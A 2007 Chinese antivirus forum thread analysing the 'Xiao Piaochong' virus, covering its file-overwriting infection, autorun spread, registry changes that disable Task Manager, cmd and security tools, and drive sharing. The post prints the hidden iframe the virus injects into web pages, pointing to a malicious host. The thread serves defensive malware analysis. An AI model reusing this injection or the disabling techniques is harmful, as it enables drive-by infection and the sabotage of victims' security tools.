爱毒霸社区 Kingsoft Internet Security  Forum

 找回密码
 注册

用新浪微博连接

一步搞定

QQ登录

只需一步,快速开始

查看: 22764|回复: 13

警惕小瓢虫病毒  关闭 [复制链接]

Rank: 26Rank: 26Rank: 26Rank: 26Rank: 26Rank: 26Rank: 26

铜钱
16047
元宝
400
威望
43888
积分
22856

枣泥月饼 豆沙月饼 病毒解剖师 电脑清理高手 最辛勤伯乐勋章

发表于 2007-12-17 18:10:30 |显示全部楼层
这个病毒看起来象熊猫烧香和AV终结者的结合体,阳光以前曾给过一个详细的分析。如果这个病毒把感染做的完美些(现在病毒还不是真正意义上的感染,是用病毒体完全覆盖正常EXE),会不会造成和李俊版熊猫烧香一样的效果呢,完全有可能。

以下是关于该病毒的详细分析报告:

一.病毒信息

    病毒名:Win32.Troj.Serwer.yx

    病毒中文名称:小瓢虫

二.病毒行为:

    这是一个感染型病毒,把会计算机上的系统时间改为 2030 年,在系统盘的system32文件夹下释放多个病毒文件。

    在计算机上的每个盘下生成SDGames.exe和Autorun.inf两个文件,以达到通过双击该盘时病毒可以运行起来.

    在每个盘下生成三个Url文件,都指向该盘下的SDGame.exe文件,三个Url文件具有迷惑性的图标。可以查看这三个URL的属性,会发现都指向c:\sdgame.exe。

    通过添加注册表启动项以达到开机时病毒能运行起来,通过修改注册表破坏系统安全模式,禁用大部分系统功能:包括,禁用任务管理器,禁用控制面板,禁止修改系统配置,锁定主页,禁用注册表编辑器等。

    映像劫持了大量软件,被劫持的软件包括"杀毒软件","系统检测工具","QQ",(连QQ都不让用,这病毒够BT)
    感染计算机上的 exe 文件,感染方式为覆盖数据. (除系统盘外,其它盘的EXE都被替换为小瓢虫图标)

     感染计算机上的 hta,html,htm,jsp,php,asp 后缀的文件,插入网页代码. (除系统盘外,这一点和熊猫烧香的传播方式相同,有可能会造成网站大面积挂马)

    把计算机上的所有盘设为所有人完全共享,(这是尼姆达病毒最常用的手段,当然,目的就是在局域网中大面积传播了。)

    病毒运行后释放以下文件:
          %systemroot%\system32\Taskeep.vbs
          %systemroot%\system32\SDGames.exe
          %systemroot%\system32\Avpser.cmd
          %systemroot%\system32\netshare.cmd
          %systemroot%\system32\AUTORUN.INF

    Taskeep.vbs 的作用是运行起病毒进程         

    netshare.cmd 的作用是打开本机的共享        

    Avpser.cmd 用于结束计算机上的大量杀毒软件、安全检测软件,常见杀毒软件都在被攻击之列。  

病毒在计算机上的每个盘下生成SDGame.exe和Autorun.inf,并生成Recycleds.url,Windows.url,新建文件夹.url三个文件,诱使用户双击.这三个文件都指向该盘下的SDGame.exe文件.(Recycleds.url 的图标为"回收站",其余两个图标为"文件夹图标")

    病毒创建注册表启动项,添加服务;

    把计算机上为以下后缀名的文件插入代码: (除系统盘外)
          ".hta"
          ".html"
          ".htm"
          ".php"
          ".asp"
          ".jsp"
    插入的代码:
       <iframe id="iframe" width="0" height="0" scrolling="no"frameborder="0" src="http://zhidaobaidu.10mb.cn/" name="Myframe"align="center" border="0">

    感染计算机上的 exe 文件,感染方式为覆盖数据.(除系统盘,被感染后的 exe 文件图标为绿色的小飘虫)

    修改计算机上的 reg 和 txt 文件关联指向 "%systemroot%\system32\SDGames.exe"

    把计算机上的系统时间改为 2030 年,中国木马制作者的惯用手法。

    通过修改注册表的方式破坏安全模式.

    禁用cmd:
          HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\DisableCMD

    破坏显示隐藏文件:
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden
          HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue
    使得文件扩展名无法显示:
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt
    隐藏控制面板:
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
    禁用注册表编辑器:
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistrytools
    禁用任务管理器:
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
    修改IE主页为: http:/ /www.zhidaobaidu.10mb.cn
    隐藏文件夹选项:
          HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions

    映像劫持常用安全软件,这次连杀毒软件的命令行查毒都没放过
以后毒霸专注于:金山毒霸、金山卫士,请大家继续支持我们吧:-)

荣誉版主

武侠路-我的社区

Rank: 22Rank: 22Rank: 22Rank: 22Rank: 22Rank: 22

铜钱
2025
元宝
5
威望
4601
积分
2468

枣泥月饼 豆沙月饼 最抽风奖 优秀版主勋章 最活跃人物 至尊黑客大师

发表于 2007-12-18 19:58:04 |显示全部楼层

使用道具 举报

爱毒霸社区缉毒队

伊斯恩·伍德

Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20

铜钱
9564
元宝
35
威望
17182
积分
8277

毒霸MVP勋章 最佳骨灰水友 幕后英雄勋章

发表于 2007-12-18 21:19:20 |显示全部楼层

使用道具 举报

Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20

铜钱
828
元宝
15
威望
6317
积分
3074

枣泥月饼 豆沙月饼 情感天使 画心 问情

发表于 2007-12-18 23:26:08 |显示全部楼层

使用道具 举报

爱毒霸社区缉毒队

淡泊以明志,宁静而致远!

Rank: 20Rank: 20Rank: 20Rank: 20Rank: 20

铜钱
2274
元宝
2
威望
5288
积分
2628

枣泥月饼 豆沙月饼

发表于 2007-12-19 22:10:51 |显示全部楼层
性格左右命运,气度影响格局,细节决定成败!

使用道具 举报

Rank: 3Rank: 3

铜钱
135
元宝
4
威望
273
积分
142

枣泥月饼 豆沙月饼

发表于 2007-12-21 18:32:59 |显示全部楼层

使用道具 举报

Rank: 1

铜钱
14
元宝
0
威望
39
积分
21

枣泥月饼 豆沙月饼

发表于 2007-12-22 15:24:10 |显示全部楼层

使用道具 举报

上士

沧桑

Rank: 6Rank: 6

铜钱
133
元宝
5
威望
1881
积分
951

枣泥月饼 豆沙月饼 最佳新人奖

发表于 2007-12-22 19:52:54 |显示全部楼层

使用道具 举报

Rank: 1

铜钱
25
元宝
0
威望
50
积分
28

枣泥月饼 豆沙月饼

发表于 2007-12-24 04:26:41 |显示全部楼层

使用道具 举报

Rank: 1

铜钱
5
元宝
0
威望
32
积分
13

枣泥月饼 豆沙月饼

发表于 2007-12-26 15:45:12 |显示全部楼层
最好的方法,也是解决其他病毒木马的终极方法。
把中毒的硬盘拿下来,在一个安全的电脑上全面杀软扫描和相关软件杀马(当然那电脑要开启防自动运行,主要防止autorun。本人使用诺顿查杀再用360全盘扫描木马。使用此方法1年多了,消灭了所有电脑病毒木马引发的故障)

使用道具 举报

Rank: 1

铜钱
8
元宝
0
威望
16
积分
9

枣泥月饼 豆沙月饼

发表于 2007-12-28 09:11:12 |显示全部楼层

使用道具 举报

Rank: 1

铜钱
5
元宝
0
威望
9
积分
5

枣泥月饼 豆沙月饼

发表于 2007-12-31 13:05:38 |显示全部楼层

使用道具 举报

Rank: 2

铜钱
42
元宝
0
威望
107
积分
59

枣泥月饼 豆沙月饼

发表于 2007-12-31 14:11:10 |显示全部楼层

使用道具 举报

Rank: 1

铜钱
1
元宝
0
威望
2
积分
1

枣泥月饼 豆沙月饼

发表于 2008-1-1 18:09:46 |显示全部楼层

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

Archiver|手机版|爱毒霸社区 ( 京ICP备10005744号 )  

GMT+8, 2012-2-10 05:35 , Processed in 0.080339 second(s), 20 queries .

Powered by Discuz! X2

© 2001-2011 Comsenz Inc.

回顶部